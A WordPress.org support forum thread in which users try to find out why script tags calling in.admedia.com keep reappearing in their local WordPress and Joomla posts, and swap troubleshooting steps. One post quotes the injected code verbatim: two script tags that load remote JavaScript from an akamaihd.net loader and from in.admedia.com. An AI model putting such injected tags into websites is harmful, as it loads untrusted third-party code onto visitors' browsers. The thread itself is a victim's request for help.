WordPress.org

Ready to get started?Download WordPress

Forums

What is in.admedia.com (21 posts)

  1. insurgenesis
    Member
    Posted 1 year ago #

    Hi I noticed something weird today...
    I'm testing a site locally and my sidebars disappear and return unannounced.
    The page load also became much longer since I installed a certain plugin.
    Upon loading it says "connecting to in.admedia.com" and a javascript snippet appears at the bottom of some posts (only visible in html text mode). When I delete it it simply reappears.
    Does anyone know what this is?

  2. michael.mariart
    Member
    Posted 1 year ago #

    The first thing to do is disable the pluign and see if that fixes your problem. If it's only doing it since you installed that plugin there's a very good chance that the pluign is the cause of it.

    What is actualyl coming from in.admedia.com is advertising code. Someone or something is trying to add some advertising to your site through whatever means they are using.

  3. insurgenesis
    Member
    Posted 1 year ago #

    When the site is fully loaded and I do Ctrl + U I can actually see all the instances of the code.
    I think it's what's known as a script inject.
    The bad news is that the code's still there after deactivating plugins.
    Will I be OK if all (visible) instances of the code can be removed, or should I use something more sophisticated to find and remove?

  4. michael.mariart
    Member
    Posted 1 year ago #

    The first thing that I would do is run your site thorugh the Sucuri checker at

    http://sitecheck.sucuri.net/scanner/

    This will tell you if anything bad is happening there.

    But yes, you should try and remove all of the code that's been added to your site. Be aware that if your site has bene hacked or compromised, then removing the code won't do that much becuase it will just be added back in later on.

  5. insurgenesis
    Member
    Posted 1 year ago #

    Thanks for your quick response.
    How can I run it on a site that's on my local server on not live yet?

  6. michael.mariart
    Member
    Posted 1 year ago #

    You can't. But if it's on your local server I wouldn't be quite as concerned with it being hacked. That's actually pretty unlikely on a site that's private like that. Just go and remove the code where it's found.

  7. insurgenesis
    Member
    Posted 1 year ago #

    In your opinion, does it sound like injection?
    And if so, will I be able to find/remove the origin of the code in a plugin's source file, or is the whole idea to remove the cause-plugin entirely and never use attempt to it again?

  8. michael.mariart
    Member
    Posted 1 year ago #

    "injection" can be done in many differnt ways, and tis is probably one of them.

    if you find that it's a plugin doing it, I'd ditch that plugin completely. Even if you remove the code now, it will come back in any future updates that it has. I don't give things like that any chance.

  9. insurgenesis
    Member
    Posted 1 year ago #

    It's really disconcerting that this sort of thing is rampant and widespread - considering that it's only local still.

    I don't know What to do.

    ...For what it's worth in this context, my wp-config "block external requests" is set to true. I would like to believe this illustrates the extent to which I wanted to be isolated from the external.

  10. insurgenesis
    Member
    Posted 1 year ago #

    Is there any way to be certain this thing hasn't inscribed itself into everything?
    Even when I delete the code from my posts in html view and press update it connects again to the very same place.

  11. michael.mariart
    Member
    Posted 1 year ago #

    That means that it's somewhere in your code, not in your posts.

    Disable EVERY plugin and change to the default theme. Now remove the code from your posts, and go and check if they show on your main site. From there, enable plugins one-by-one (only one at a time, never more), do an update to a post, and go and check it on the live site again. This will show you if it's a plugin that's causing this as you'll see the code back after you enable one of the plugins, or the theme. When you find out whcih one it is, delete that plugin completely.

  12. insurgenesis
    Member
    Posted 1 year ago #

    thanks

  13. insurgenesis
    Member
    Posted 1 year ago #

    It's not a plugin - I disabled all.
    I'm using a child theme. Perhaps you know where else I can look?

  14. michael.mariart
    Member
    Posted 1 year ago #

    If it's not a plugin or your theme (you didn't say you went back to the default theme...) then I don't know where it coudl be. i'd suggest that you download the entire WP zip file again and re-install that over the top of what you have now. If that doesn't fix it, do a complete re-install.

  15. insurgenesis
    Member
    Posted 1 year ago #

    Sorry, went back to default theme.
    Upon page load same message appears.
    It seems to be connecting to a site (or is instructed to do so) regardless of my choice of plugins and theme.
    What is an sql injection?

  16. polaris1990
    Member
    Posted 1 year ago #

    Hi men, I've got the same problem.
    I use Joomla 1.7 CMS
    The problem in local site...
    Some pages loading too slow...
    Upon loading it says "connecting to in.admedia.com"
    Here is the page:
    http://sws-studio.com/demo/avm/company/brands
    I've noticed that all sites are connecting to to in.admedia.com, but some pages load too slow.
    Here is a code which it adds in some places:

    <br /><br data-mce-bogus="1" />
    <script type="text/javascript" src="http://cdncache3-a.akamaihd.net/loaders/1032/l.js?aoi=1311798366&pid=1032&zoneid=62862"></script>
    <script src="https://in.admedia.com/?id=ODorNiU" type="text/javascript"></script>
  17. insurgenesis
    Member
    Posted 1 year ago #

    @polaris1990
    I don't see it when I load your page from the link provided.
    Did you clear your browser cache properly?
    Which browser are you using?

  18. polaris1990
    Member
    Posted 1 year ago #

    http://bulkin.lootsk.com/2012/.jpg
    I've cleaned all, I tried using different browsers and computers

  19. insurgenesis
    Member
    Posted 1 year ago #

    In my case a similar script was placed below each post only if I switched from html to visual mode in the text editor while editing a post.

    Try disabling ALL plugins and delete all instances of the code manually. You can then do a proper search for remaining bits if you think you didn't catch all.

    I then installed this http://wordpress.org/extend/plugins/tinymce-advanced/ to take over the role of the default editor. Besides other useful features it offers, I am now able to switch back and forth between the editing modes without the code slipping in.

    Here's how the saga played out for me:
    http://wordpress.org/support/topic/how-to-recognise-a-script-injection?replies=46

  20. insurgenesis
    Member
    Posted 1 year ago #

    BTW - you can also do magical things with .htaccess to block certain requests you don't trust:
    http://perishablepress.com/eight-ways-to-blacklist-with-apaches-mod_rewrite/
    But make sure your server configuration will like what you do to it...

    I happen to have the IP address associated with the domain name in the script so it was easy to block it. Although I understand that if the recurrence of the code is generated from within your code base you would want to know more about it and not simply "block" it.

    [ Please do not bump, that's not permitted here. ]

  21. polaris1990
    Member
    Posted 1 year ago #

    Hi there! Reinstalation of WAMP and cleaning of the code helped!
    Thanks to all!

Topic Closed

This topic has been closed to new replies.

About this Topic